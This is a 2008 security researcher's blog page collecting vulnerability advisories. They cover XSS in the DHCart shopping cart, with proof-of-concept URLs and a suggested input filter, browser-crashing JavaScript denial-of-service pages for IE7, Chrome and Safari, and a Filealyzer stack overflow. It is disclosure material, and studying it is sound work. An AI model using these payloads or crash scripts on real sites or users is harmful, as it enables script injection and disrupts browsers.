DHCart Multiple variable XSS and stored XSS

Tuesday, November 04, 2008
###########################################
DHCart Multiple variable XSS and stored XSS
Vendor URL:http://www.dhcart.com/
Advisore:http://lostmon.blogspot.com/
2008/11/dhcart-multiple-variable-xss-and-stored.html
vendor notify:YES Exploit:YES Patch:YES
###########################################

DHCart is a PHP based application that provides a simple
to use shopping cart for users purchasing domain names
and hosting services.

DHCart is prove vulnerable to Cross site scripting and
stored cross-site scripting.

################
Solution
###############

The vendor has reported that latest version of
DHCart is 3.86 and there is no any security bug
after v3.85.

#############
see this PoC

http://Victim/order.php?dhaction=check&submit_domain=
Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2F
script%3E&ext1=on

or

http://Victim/order.php?dhaction=add&d1=lalalalasss
%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=
0&h1=1&addtocart1=on&n=3

in this case the xss is exploitable via url , and it's stored
in the cart, wen the users goes to look his cart the xss
is executed again (stored XSS)

Vulnerable code:

arround line 93 in config.php file we found:

if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = $value;

this is vulnerable because $value is returned to the users without sanitize.

i have fully pached ... add a function to filter variables and apply this filter to $value variable.


///////////////////////////////////////////////////////////////////////////
// Code below this point should not need modifying. Do so at your own risk!
///////////////////////////////////////////////////////////////////////////
function StopXSS($text)
{
if(!is_array($text))
{
$text = preg_replace("/\(\)/si", "", $text);
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
}
else
{
foreach($text as $k=>$t)
{
$t = preg_replace("/\(\)/si", "", $t);
$t = strip_tags($t);
$t = str_replace(array("'","\"",">","<","\\"), "", $t);
$text[$k] = $t;
}
}
return $text;
}

if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = StopXSS($value);

######################€nd##################
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
Thnx To Climbo


--
atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Multiple Browsers Stack overflow in javascript with infinite array

Sunday, November 02, 2008
##################################################
Multiple Browsers Stack overflow in javascript with infinite array
##################################################
############
Description
############

Multiple Browsers are prone vulnerables to a stack overflow
or crash via infinite array in Javascript engine.
This is a extended research from this vulnerability/exploit :
http://www.securityfocus.com/bid/31703

This issue can use for example in a web post vulnerable to xss
Style attacks or similar to do a DoS from web to Web browsers victim´s.

################
Browsers Tested:
################

Fail = affected
pass = Not affected ¿?

#####################
Testing
#####################
.:[-Multiple Browsers infnite array PoC By Lostmon -]:.
Here You have two variants of this array sav this file:
#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type="text/javascript">
function infinite_array()
{
foo = new Array();
alert('infinite array');
while(true) {foo = new Array(foo);}
}
function infinite_array2()
{
foo = new Array();
alert('Infinite array with sort()');
while(true) {foo = new Array(foo).sort();}
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type="button" value="Infinite array Without sort()" onclick="infinite_array();" />
<input type="button" value="Infinite array with sort()" onclick="infinite_array2();" />
</body></html>
####################################

###############
Stack Overflow
###############

IE7 , Avant Browser and Maxthor browsers this cause a stack
overflow in javascript.

In ie7 i try to trace and exploit it with olly debugger ,
but all cases what i test to turn it executable , are all
time go to SEH. This is not exploitable , and the browsers
wen click in the alert can continue working without problems;
them this is a recoverable issue.Microsoft security team has
determine that this issue at this moment is not exploitable.

In Google Chrome can cause a tab Crash or if we only have
open one window and one tab, open the exploit, and don´t wait,
try to navigate to google or other site causes that google
Chrome close without warning , error, or alert, if we have
open multiple tabs, this issue only crash/close the tab
affected by the exploit. If open the exploit and wait few
seconds Chrome show a warning to close the crashed tab.


################
Memory abuse
################

In ie7 can cause a memory abuse and can turn unestable all
system and all aplications.(it can load all memory)

In safari for windows can cause a program termination, safari
closes all windows, all tabs without a alert or a warning or
error.With olly , can trace , and it´s too a stack overflow.

In Google Chrome can cause a tab Crash or if we only have open
one window and one tab, open the exploit, and don´t wait, try
to navigate to google or other site causes that google Chrome
close without warning , error, or alert if open the exploit
and wait few seconds Chrome show a warning to close the
crashed tab.

Some other browsers detects the slow scripts and ask for stop.
In opera , it abuse memory , but we can recover it or navigate
to other sites them this is a recoverable issue.

#######################€nd#####################

Thnx to Microsoft security team for support & interesting.
Thnx to Apple security team for support & interesting.
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com


--
atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for widnows and Google Chrome Window.open and alert DoS

Monday, September 29, 2008
#####################################
Safari for windows and Google Chrome
Window.open & alert DoS
#####################################

Reported Here => http://code.google.com/p/chromium/issues/detail?id=2966

Product Version : 0.2.149.30 (2200)
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 3: FAIL
Firefox 3: OK
IE 7: OK

What steps will reproduce the problem?
1. Open a Malicious page with evil script code

What is the expected result?
Chrome open one window and show one alert.


What happens instead?
Chrome open all time a new window wen the users click in OK
from alert...

Please provide any additional information below. Attach a screenshot if
possible.

##########################
Evil Page with Javascript
##########################
<html>
<head></head>
<title> Chrome Window.open & alert DoS</title>
<body>
<script>
DMK = window.open(location.reload('http://lostmon.blogspot.com'));
DMK.alert(DMK)
</script>
</body>
</html>


##################€nd##############
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Filealyzer 1.6.0.4 Stak overflow

Sunday, September 28, 2008
#################################
Filealyzer 1.6.0.4 Stak overflow
Vendor url:http://www.safer-networking.org/
Advisore:http://lostmon.blogspot.com/
2008/09/filealyzer-1604-stak-overflow.html
Vendor notify:yes exploit:PRIVATE
###############################


#############################
Overview By vendor
#############################

http://www.safer-networking.org/en/filealyzer/index.html

FileAlyzer is a tool to analyze files - the name itself
was initially just a typo of FileAnalyzer, but after a
few days I decided to keep it. FileAlyzer allows a basic
analysis of files (showing file properties and file contents
in hex dump form) and is able to interpret common file
contents like resources structures (like text, graphics,
HTML, media and PE).

Using FileAlyzer is as simple as viewing the regular properties
of a file - just right-click the file you want to analyze and
choose Open in FileAlyzer.

###################
Description of bug
###################

http://forums.spybot.info/showthread.php?t=34737

Filealyzer is prone vulnerable to a stack overflow
wen parsing a malformed exe file with a malformed
version information.

The asm code reveals that the application fails
in a instruction wen try to move EAX register value
to EAX register again.




#######################
Signature for identify
#######################

This information Is of ID´s Systems
or antivirus or antispyware software
to easy detect.

filesize=327168
timestamp[file]=2008-08-26 14:24:23
md5=B84ADA93FAEB728F024687A6127B5AAB
crc32=4629A2C8
exists[authx509]=0

######################
Solution
###################

No sulution at this time !!!

##############
Time Line
##############

Discovered:02-07-2008
Vendor notify:28-09-2008
Disclosure:28-09-2008

##################€nd##############
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends